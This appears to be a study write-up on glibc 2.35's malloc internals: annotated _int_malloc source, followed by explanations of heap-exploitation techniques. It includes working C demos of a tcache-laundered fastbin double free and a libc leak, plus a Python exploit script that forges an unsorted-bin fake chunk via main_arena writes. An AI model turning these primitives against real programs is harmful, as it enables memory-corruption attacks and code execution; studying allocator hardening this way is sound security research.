              fwd = bck->fd;

              /* maintain large bins in sorted order */   /* this part keeps the largebin sorted by size */
              if (fwd != bck)
                {
                  /* Or with inuse bit to speed comparisons */
                  size |= PREV_INUSE;
                  /* if smaller than smallest, bypass loop below */
                  assert (chunk_main_arena (bck->bk));
                  if ((unsigned long) (size)
                      < (unsigned long) chunksize_nomask (bck->bk))
                    {
                      fwd = bck;
                      bck = bck->bk;

                      victim->fd_nextsize = fwd->fd;
                      victim->bk_nextsize = fwd->fd->bk_nextsize;
                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
                    }
                  else
                    {
                      assert (chunk_main_arena (fwd));
                      while ((unsigned long) size < chunksize_nomask (fwd))
                        {
                          fwd = fwd->fd_nextsize;
                          assert (chunk_main_arena (fwd));
                        }

                      if ((unsigned long) size
                          == (unsigned long) chunksize_nomask (fwd))
                        /* Always insert in the second position.  */
                        fwd = fwd->fd;
                      else
                        {
                          victim->fd_nextsize = fwd;
                          victim->bk_nextsize = fwd->bk_nextsize;
                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
                          fwd->bk_nextsize = victim;
                          victim->bk_nextsize->fd_nextsize = victim;
                        }
                      bck = fwd->bk;
                      if (bck->fd != fwd)
                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
                    }
                }
              else
                victim->fd_nextsize = victim->bk_nextsize = victim;
            }

          mark_bin (av, victim_index);
          victim->bk = bck;
          victim->fd = fwd;
          fwd->bk = victim;
          bck->fd = victim;

#if USE_TCACHE
          /* If we've processed as many chunks as we're allowed while
             filling the cache, return one of the cached ones.  */
          ++tcache_unsorted_count;   /* stop filling the tcache once the processing limit is exceeded */
          if (return_cached
              && mp_.tcache_unsorted_limit > 0
              && tcache_unsorted_count > mp_.tcache_unsorted_limit)
            {
              return tcache_get (tc_idx);
            }
#endif

#define MAX_ITERS       10000
          if (++iters >= MAX_ITERS)
            break;
        }

#if USE_TCACHE
      /* If all the small chunks we found ended up cached, return one now.  */
      if (return_cached)   /* chunks stashed above can simply be taken from the tcache now */
        {
          return tcache_get (tc_idx);
        }
#endif

      /*
         If a large request, scan through the chunks of current bin in
         sorted order to find smallest that fits.  Use the skip list for this.
       */
      /* for a largebin-range request, scan the largebin chunks for the best fit */
      if (!in_smallbin_range (nb))
        {
          bin = bin_at (av, idx);

          /* skip scan if empty or largest chunk is too small */
          if ((victim = first (bin)) != bin
              && (unsigned long) chunksize_nomask (victim)
                >= (unsigned long) (nb))
            {
              victim = victim->bk_nextsize;
              while (((unsigned long) (size = chunksize (victim)) <
                      (unsigned long) (nb)))
                victim = victim->bk_nextsize;

              /* Avoid removing the first entry for a size so that the skip
                 list does not have to be rerouted.  */
              if (victim != last (bin)
                  && chunksize_nomask (victim)
                    == chunksize_nomask (victim->fd))
                victim = victim->fd;

              remainder_size = size - nb;
              unlink_chunk (av, victim);

              /* Exhaust */
              if (remainder_size < MINSIZE)
                {
                  set_inuse_bit_at_offset (victim, size);
                  if (av != &main_arena)
                    set_non_main_arena (victim);
                }
              /* Split */
              else
                {
                  remainder = chunk_at_offset (victim, nb);
                  /* We cannot assume the unsorted list is empty and therefore
                     have to perform a complete insert here.  */
                  bck = unsorted_chunks (av);
                  fwd = bck->fd;
                  if (__glibc_unlikely (fwd->bk != bck))
                    malloc_printerr ("malloc(): corrupted unsorted chunks");
                  remainder->bk = bck;
                  remainder->fd = fwd;
                  bck->fd = remainder;
                  fwd->bk = remainder;
                  if (!in_smallbin_range (remainder_size))
                    {
                      remainder->fd_nextsize = NULL;
                      remainder->bk_nextsize = NULL;
                    }
                  set_head (victim, nb | PREV_INUSE |
                            (av != &main_arena ? NON_MAIN_ARENA : 0));
                  set_head (remainder, remainder_size | PREV_INUSE);
                  set_foot (remainder, remainder_size);
                }
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
            }
        }

      /*
         Search for a chunk by scanning bins, starting with next largest
         bin. This search is strictly by best-fit; i.e., the smallest
         (with ties going to approximately the least recently used) chunk
         that fits is selected.

         The bitmap avoids needing to check that most blocks are nonempty.
         The particular case of skipping all bins during warm-up phases
         when no chunks have been returned yet is faster than it might look.
       */

      ++idx;
      bin = bin_at (av, idx);   /* the binmap part below I haven't fully figured out yet */
      block = idx2block (idx);
      map = av->binmap[block];
      bit = idx2bit (idx);

      for (;; )
        {
          /* Skip rest of block if there are no more set bits in this block.  */
          if (bit > map || bit == 0)
            {
              do
                {
                  if (++block >= BINMAPSIZE) /* out of bins */
                    goto use_top;
                }
              while ((map = av->binmap[block]) == 0);

              bin = bin_at (av, (block << BINMAPSHIFT));
              bit = 1;
            }

          /* Advance to bin with set bit. There must be one. */
          while ((bit & map) == 0)
            {
              bin = next_bin (bin);
              bit <<= 1;
              assert (bit != 0);
            }

          /* Inspect the bin. It is likely to be non-empty */
          victim = last (bin);

          /*  If a false alarm (empty bin), clear the bit. */
          if (victim == bin)
            {
              av->binmap[block] = map &= ~bit; /* Write through */
              bin = next_bin (bin);
              bit <<= 1;
            }

          else
            {
              size = chunksize (victim);

              /*  We know the first chunk in this bin is big enough to use. */
              assert ((unsigned long) (size) >= (unsigned long) (nb));

              remainder_size = size - nb;

              /* unlink */
              unlink_chunk (av, victim);

              /* Exhaust */
              if (remainder_size < MINSIZE)
                {
                  set_inuse_bit_at_offset (victim, size);
                  if (av != &main_arena)
                    set_non_main_arena (victim);
                }

              /* Split */
              else
                {
                  remainder = chunk_at_offset (victim, nb);

                  /* We cannot assume the unsorted list is empty and therefore
                     have to perform a complete insert here.  */
                  bck = unsorted_chunks (av);
                  fwd = bck->fd;
                  if (__glibc_unlikely (fwd->bk != bck))
                    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
                  remainder->bk = bck;
                  remainder->fd = fwd;
                  bck->fd = remainder;
                  fwd->bk = remainder;

                  /* advertise as last remainder */
                  if (in_smallbin_range (nb))
                    av->last_remainder = remainder;
                  if (!in_smallbin_range (remainder_size))
                    {
                      remainder->fd_nextsize = NULL;
                      remainder->bk_nextsize = NULL;
                    }
                  set_head (victim, nb | PREV_INUSE |
                            (av != &main_arena ? NON_MAIN_ARENA : 0));
                  set_head (remainder, remainder_size | PREV_INUSE);
                  set_foot (remainder, remainder_size);
                }
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
            }
        }

    use_top:
      /*
         If large enough, split off the chunk bordering the end of memory
         (held in av->top). Note that this is in accord with the best-fit
         search rule.  In effect, av->top is treated as larger (and thus
         less well fitting) than any other available chunk since it can
         be extended to be as large as necessary (up to system
         limitations).

         We require that av->top always exists (i.e., has size >=
         MINSIZE) after initialization, so if it would otherwise be
         exhausted by current request, it is replenished. (The main
         reason for ensuring it exists is that we may need MINSIZE space
         to put in fenceposts in sysmalloc.)
       */

      victim = av->top;
      size = chunksize (victim);

      if (__glibc_unlikely (size > av->system_mem))
        malloc_printerr ("malloc(): corrupted top size");

      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
        {
          remainder_size = size - nb;
          remainder = chunk_at_offset (victim, nb);
          av->top = remainder;
          set_head (victim, nb | PREV_INUSE |
                    (av != &main_arena ? NON_MAIN_ARENA : 0));
          set_head (remainder, remainder_size | PREV_INUSE);

          check_malloced_chunk (av, victim, nb);
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }

      /* When we are using atomic ops to free fast chunks we can get
         here for all block sizes.  */
      else if (atomic_load_relaxed (&av->have_fastchunks))
        {
          malloc_consolidate (av);
          /* restore original bin index */
          if (in_smallbin_range (nb))
            idx = smallbin_index (nb);
          else
            idx = largebin_index (nb);
        }

      /*
         Otherwise, relay to handle system-dependent cases
       */
      else
        {
          void *p = sysmalloc (nb, av);
          if (p != NULL)
            alloc_perturb (p, bytes);
          return p;
        }
    }
}

After reading these several hundred lines, things still feel a bit hazy, so let me summarize.
First, _int_malloc checks whether nb falls within fastbin range. If so, it fetches the corresponding fastbin list head, and when the list holds free chunks it pops one (fastbins are LIFO). At the same time, if tcache is enabled, the matching tcache bin still has room (a bin holds at most 7 chunks by default), and the fastbin list is non-empty after one chunk is taken, the tcache stashing logic kicks in and moves the leftover fastbin chunks into the tcache.
This mechanism is exploitable. Since glibc 2.29, tcache bins guard against double free: when a chunk is freed into a tcache list, a key is written into its bk field (the heap address with the low three hex digits dropped; since 2.34 it is a random tcache_key instead), and an attacker must change the key before the same chunk can be freed again. The fastbin double-free check, by contrast, only compares the pointer being freed against the most recently freed one. So the double free can be done in the fastbin, and tcache stashing then carries the poisoned list into the tcache.
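A minimal sketch of that laundering trick (my own demo, assuming a tcache-era glibc in the 2.27-2.35 range; the 0x40 request size is arbitrary):

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    void *pad[7], *slots[7];

    for (int i = 0; i < 7; i++) pad[i] = malloc(0x40);
    void *a = malloc(0x40);
    void *b = malloc(0x40);

    for (int i = 0; i < 7; i++) free(pad[i]);   /* fill the 0x50 tcache bin (7 entries) */
    free(a);   /* a -> fastbin */
    free(b);   /* b -> fastbin, now the list head */
    free(a);   /* double free passes: fastbin only checks the head (b != a) */

    for (int i = 0; i < 7; i++) slots[i] = malloc(0x40);   /* drain the tcache */
    void *x = malloc(0x40);   /* pops a from the fastbin; the stash loop then moves
                                 the rest of the (cyclic) list b, a, b, ... into the tcache */
    void *y = malloc(0x40);   /* served from the tcache */
    void *z = malloc(0x40);   /* ... and a comes back a second time */
    printf("x=%p y=%p z=%p -> x == z: the same chunk allocated twice\n", x, y, z);
    return 0;
}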
Next, if nb is within smallbin range, the smallbins are walked. Like the fastbin and tcache bins, each smallbin serves a single size, which makes lookup fast; this code path includes the same tcache stashing, again for allocation efficiency.
If nb falls within largebin range, malloc_consolidate is called to merge physically adjacent fastbin chunks. This function is itself the source of many bugs: take two physically adjacent fastbin chunks A and B, with the attacker holding a UAF. Before malloc_consolidate fires, the attacker controls only a fastbin chunk; once it fires, the chunks merge into a smallbin-sized chunk whose fd and bk fields are filled with real libc addresses, so the UAF can be used to leak the libc base, as sketched below.
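A sketch of that leak primitive (my own demo; the UAF is simulated by simply reusing the dangling pointer A):

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    void *pad[7];
    for (int i = 0; i < 7; i++) pad[i] = malloc(0x40);
    char *A = malloc(0x40);
    char *B = malloc(0x40);   /* physically adjacent to A */
    malloc(0x10);             /* guard: keep B away from the top chunk */

    for (int i = 0; i < 7; i++) free(pad[i]);   /* fill the 0x50 tcache bin */
    free(A);
    free(B);                  /* both land in the fastbin */

    malloc(0x500);            /* largebin-range request triggers malloc_consolidate */

    /* A and B have merged into one free chunk whose fd/bk now point into
       main_arena, i.e. into libc */
    printf("A->fd = %p (a main_arena pointer)\n", *(void **) A);   /* simulated UAF read */
    return 0;
}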
The code after that handles allocation from the unsorted bin. The crucial parts are the checks below: they prevent an attacker from crafting the fd and bk fields of an unsorted-bin chunk to gain an arbitrary-address allocation or an arbitrary write.

while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
  {
    bck = victim->bk;   /* the second-to-last chunk in the list */
    size = chunksize (victim);
    mchunkptr next = chunk_at_offset (victim, size);   /* the chunk physically adjacent after victim */
    if (__glibc_unlikely (size <= CHUNK_HDR_SZ)   /* sanity check on victim's size */
        || __glibc_unlikely (size > av->system_mem))
      malloc_printerr ("malloc(): invalid size (unsorted)");
    if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ)   /* the next chunk's size must be sane */
        || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
      malloc_printerr ("malloc(): invalid next size (unsorted)");
    if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))   /* next chunk's prev_size must match */
      malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
    if (__glibc_unlikely (bck->fd != victim)   /* linked-list integrity check */
        || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
      malloc_printerr ("malloc(): unsorted double linked list corrupted");
    if (__glibc_unlikely (prev_inuse (next)))   /* next chunk's prev_inuse bit must be 0 */
      malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

unsorted_chunks(av) yields the unsorted-bin list head. When the head's bk points to itself, i.e. head and tail are the same chunk, the list holds no other chunks and the while loop is skipped. This check looks simple, but it provides a lot of protection in practice: when forging a chunk, this is exactly the check I could not get around in order to skip the while loop.
The first check validates victim's size.
The second and third checks validate the size and prev_size of the chunk physically adjacent to victim.
The fourth check verifies that the fd of victim's previous chunk (bck) points back to victim, ensuring list integrity.
The fifth check inspects the prev_inuse bit in next_chunk: every chunk sitting in the unsorted bin must be free, so a set inuse bit triggers an abort.
Also, right after a chunk is taken off the unsorted bin, two statements fix up the fd and bk fields to keep the list connected:

/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))   /* sanity check */
  malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

These two statements are what the pre-2.31 unsortedbin attack abuses: overwrite an unsorted-bin chunk's bk with ptr_addr - 0x10, and when bck->fd = unsorted_chunks (av) executes, the unsorted-bin list head address gets written to ptr_addr. Combined with an IO chain this can overwrite _IO_list_all, forge an IO struct, and hijack control flow.
From 2.31 on, though, the linked-list checks on unsorted-bin chunks were tightened, and arbitrary write is no longer achievable without modifying main_arena. In step 3 below I'll show how modifying main_arena still yields an arbitrary-address allocation.
Back in the source: if the requested size exactly matches a chunk in the list, the matching chunk is first moved into the tcache (if that bin has room); on the next iteration, with the list now empty, the while loop is skipped and the chunk is returned straight from the tcache.
If the sizes differ, the chunk is sorted into the largebin or smallbin according to its size, and allocation proceeds from there.

To forge a fake chunk into the unsorted-bin list and get realloc to allocate it, the bk field of the list-head chunk must be overwritten.
Next, the fake chunk's fd must be made to point at main_arena; its size field, and the chunk header of its physically adjacent next chunk, must also be forged properly.
With that groundwork done, the remaining hurdle is avoiding the while loop: as long as the list structure isn't properly completed, the program keeps believing there are chunks in the list, keeps iterating, and an abort is inevitable.
To detach the fake chunk from the list, the key check to defeat is the following:

victim = unsorted_chunks (av)->bk;
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim)   /* linked-list integrity check */
    || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
  malloc_printerr ("malloc(): unsorted double linked list corrupted");
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))   /* loop condition */

victim points at the fake chunk, and bck is loaded from the fake chunk's bk field.
We need bck's fd to point at the fake chunk, and the fake chunk's fd to point at main_arena.
That looks easy to satisfy, but the catch is that on the next iteration of the while loop, victim becomes bck.
If bck's bk does not lead back to main_arena at that point, the loop body runs again, bck's own list structure has to be arranged all over again, and the process recurses without end.
In practice that is impossible, unless what we allocate is main_arena itself, and even that requires the ability to modify main_arena so that the size and prev_size checks pass.
Since main_arena must be modified anyway, is there an easier way to tamper? First, point the fake chunk's bk at unsorted_chunks(av): that satisfies the while loop's exit condition.
Next, the bck->fd == victim check must be passed:
make unsorted_chunks(av)'s fd point at victim, i.e. write victim at main_arena+96+0x10.

# add/delete/show/edit/any_write are menu wrappers for the demo binary used
# in this experiment (definitions omitted).
bss_addr = elf.bss(0x300)
add(0x500,"aaaa")#0
add(0x10,"aaaa")#1
add(0x10,"aaaa")#2
delete(1)
delete(2)
show(1)
heap_addr = u64(io.recv(5).ljust(8,b'\x00'))<<12   # the first tcache chunk's fd is heap >> 12 (safe-linking), so shift back
success("heap_addr :"+hex(heap_addr))
delete(0)
show(0)
libc_addr = u64(io.recv(6).ljust(8,b'\x00'))-0x1f2ce0   # unsorted-bin fd points into main_arena
success("libc_addr :"+hex(libc_addr))


add(0x500,"aaaa")#3
add(0x10,"aaaa")#4
add(0x10,"aaaa")#5

add(0x500,"aaaa")#6
add(0x10,"aaaa")#7
delete(6)
# chunk 6 (in the unsorted bin): fd = unsorted_chunks(av), bk = the fake chunk on the bss
payload = p64(libc_addr + 0x1f2ce0)+p64(bss_addr)

edit(6,len(payload),payload)   # UAF write into the freed unsorted-bin chunk
# fake chunk: size 0x30, fd = the real unsorted chunk 6 (so bck->fd == victim holds on the
# first iteration; the allocator then rewrites fd to unsorted_chunks(av)), bk = unsorted_chunks(av)
any_write(p64(bss_addr+0x8),p64(0x30)+p64(heap_addr+0x7e0)+p64(libc_addr+0x1f2ce0))
# the fake chunk's next chunk: prev_size = 0x30, size = 0x20
payload = p64(0x30)+p64(0x20)
any_write(p64(bss_addr+0x30),payload)
# write the fake chunk at unsorted_chunks(av)->fd (main_arena+96+0x10)
any_write(p64(libc_addr+0x1f2ce0+0x10),p64(bss_addr))
gdb.attach(io,'b *malloc+10')
add(0x20,"aaaa")#8
pause()

[screenshot: malloc returns the forged fake chunk]
The forged fake chunk is successfully allocated.
To pull off this illegal allocation, we had to: leak the heap address and the libc address;
overwrite the unsorted-bin chunk's bk field;
forge the fake chunk's size, fd, and bk fields, plus the prev_size and size of its physically adjacent next chunk;
and write the fake chunk's address at main_arena+96+0x10.
Clearly glibc 2.35's unsorted-bin checks are strict: getting past them requires a great deal of control over memory.
